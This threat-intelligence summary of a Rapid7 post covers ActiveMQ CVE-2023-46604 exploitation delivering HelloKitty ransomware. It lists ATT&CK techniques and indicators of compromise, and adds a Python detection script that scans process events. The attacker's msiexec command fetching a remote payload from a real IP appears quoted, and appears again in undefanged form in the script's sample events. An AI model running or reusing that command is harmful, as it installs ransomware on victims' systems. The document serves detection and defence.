Suspected Exploitation of Apache ActiveMQ CVE-2023-46604 | Rapid7 Blog

Rapid7 MDR observed suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two customer environments, with attackers attempting to deploy HelloKitty ransomware on outdated ActiveMQ versions. The analysis details the vulnerability, attacker behavior (including MSIExec-delivered payloads), and specific indicators to help defenders mitigate risk. #HelloKitty #ActiveMQ #CVE-2023-46604 #dllloader #EncDLL #M2 #M4

Keypoints

  • Rapid7 MDR observed suspected CVE-2023-46604 exploitation in two environments, tied to the HelloKitty ransomware family.
  • The vulnerability is an insecure deserialization issue in Apache ActiveMQ OpenWire, enabling remote code execution (CVE-2023-46604).
  • Adversaries exploited the vulnerability to run Java.exe targeting a specific ActiveMQ instance and used MSIExec to load remote binaries M2.png and M4.png.
  • HelloKitty payloads are delivered via MSI packages (M2.msi, M4.msi) containing dllloader and EncDLL, with encryption of files and a .locked extension.
  • IOCs include specific log entries, host IPs, a domain, file hashes, and the URLs used to download the payloads (e.g., 172.245.16[.]125).
  • Mitigation centers on updating ActiveMQ to fixed versions and applying Apache’s guidance, with Rapid7 detections and customer rules in MDR/InsightIDR/MTC.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Insecure deserialization in the OpenWire protocol lets a remote attacker with network access to the broker instantiate arbitrary classes on the classpath and run shell commands. “CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker ‘to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.’”
  • [T1218.005] Signed Binary Proxy Execution – During post-exploitation, MSIExec is used to load remote binaries (M2.png and M4.png). “load remote binaries named M2.png and M4.png using MSIExec.”
  • [T1105] Ingress Tool Transfer – The adversary downloads payloads (M2.png/M4.png) from a remote server hosted at 172.245.16[.]125. “Dropped and executed via the msiexec command” with downloads from hxxp://172.245.16[.]125/…
  • [T1059.003] Windows Command Shell – Commands are executed through cmd.exe to start MSIExec, e.g., “cmd.exe /c ‘start msiexec /q /i hxxp://172.245.16[.]125/m4.png’”.
  • [T1071.001] Web Protocols – The malware communicates with an HTTP server (172.245.16[.]125) as part of its operations. “communicating to an HTTP server, 172.245.16[.]125.”
  • [T1490] Inhibit System Recovery – The ransomware deletes volume shadow copies to hinder recovery. “Volume Shadow Service Delete Shadow Copies.”
  • [T1486] Data Encrypted for Impact – EncDLL encrypts specific file extensions and appends .locked to encrypted files. “encrypt specific file extensions using the RSACryptoServiceProvider … appended with the extension .locked.”

Indicators of Compromise

  • [Process] Java.exe running the ActiveMQ broker – path shown (D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64); appears as the parent process in the incidents.
  • [URL] hxxp://172.245.16[.]125/m4.png, hxxp://172.245.16[.]125/m2.png – downloads via msiexec.
  • [File] M2.msi – 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
  • [File] M4.msi – 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
  • [File] dllloader – C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
  • [File] EncDll – 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5
  • [IP] 192.168.86.35 – observed in exploitation log with port 61616 (researcher IP in lab environment)
  • [IP] 172.245.16.125 – HTTP server hosting the MSI packages (payload download / command and control)
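The MITRE techniques and indicators above translate directly into host-based detection logic. The following Python script is an added example (not Rapid7's code and not from the original post) that scans process-creation and file events for the three behaviours the post describes: the ActiveMQ Java process spawning a command shell, msiexec installing a package from a remote URL (scored higher when the host is the published IP or the path ends in an image extension, as with m2.png/m4.png), and any file whose SHA-256 matches the published hashes. The JSON event format, field names, hostnames and the sample events are constructed for the example; the hashes and IP are the ones listed above.

```python
import json
import re
from urllib.parse import urlparse

# SHA-256 values published in the Rapid7 post, lower-cased for comparison.
IOC_SHA256 = {
    "8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4": "M2.msi",
    "8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0": "M4.msi",
    "c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7": "dllloader",
    "3e65437f910f1f4e93809b81c19942ef74aa250ae228caca0b278fc523ad47c5": "EncDll",
}
IOC_HOSTS = {"172.245.16.125"}

# msiexec ... /i <http(s) URL>  (the "/q" quiet switch may appear before or after /i)
REMOTE_MSI = re.compile(
    r"msiexec(?:\.exe)?\b[^\n]*?/i\s+\"?(?P<url>https?://[^\s\"']+)", re.IGNORECASE
)
SHELLS = {"cmd.exe", "powershell.exe", "msiexec.exe"}


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(ev):
    """Return a list of findings for one event dict (assumed field names)."""
    findings = []

    sha = (ev.get("sha256") or "").lower()
    if sha in IOC_SHA256:
        findings.append({"rule": "known-hash", "severity": "high",
                         "detail": IOC_SHA256[sha]})

    parent, image = ev.get("parent_image", ""), ev.get("image", "")
    if (_basename(parent) == "java.exe" and "activemq" in parent.lower()
            and _basename(image) in SHELLS):
        findings.append({"rule": "activemq-broker-spawns-shell", "severity": "high",
                         "detail": _basename(image)})

    m = REMOTE_MSI.search(ev.get("command_line", ""))
    if m:
        url = m.group("url")
        parsed = urlparse(url)
        host = parsed.hostname or ""
        disguised = parsed.path.lower().endswith((".png", ".jpg", ".gif"))
        severity = "high" if host in IOC_HOSTS or disguised else "medium"
        findings.append({"rule": "msiexec-remote-install", "severity": severity,
                         "detail": url})
    return findings


def scan_log(lines):
    """Parse JSON-per-line events and collect findings with timestamp and host."""
    results = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for f in analyze_event(ev):
            results.append({"ts": ev.get("ts"), "host": ev.get("host"), **f})
    return results


# Constructed sample events (not real telemetry); the ActiveMQ path mirrors the post.
SAMPLE_EVENTS = [
    {"ts": "2023-10-27T10:01:02Z", "host": "MQ01",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"ts": "2023-10-27T10:05:41Z", "host": "MQ01",
     "parent_image": "D:\\Program files\\ActiveMQ\\apache-activemq-5.15.3\\bin\\win64\\java.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c \"start msiexec /q /i http://172.245.16.125/m4.png\""},
    {"ts": "2023-10-27T11:20:00Z", "host": "WS07",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "command_line": "msiexec.exe /i https://updates.example.test/agent.msi /qn"},
    {"ts": "2023-10-27T10:05:43Z", "host": "MQ01",
     "image": "C:\\Users\\Public\\M4.msi",
     "sha256": "8C226E1F640B570A4A542078A7DB59BB1F1A55CF143782D93514E3BD86DC07A0"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The second sample event fires twice (broker-to-shell plus remote MSI from the published IP), the third is a remote MSI install from an unrelated host and is only scored medium, and the fourth matches the M4.msi hash regardless of letter case. In production the hash and host sets would be loaded from a threat-intel feed rather than hard-coded, and the parent-process rule is worth keeping even after patching, since a broker process spawning cmd.exe is anomalous on its own.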

Read more: https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/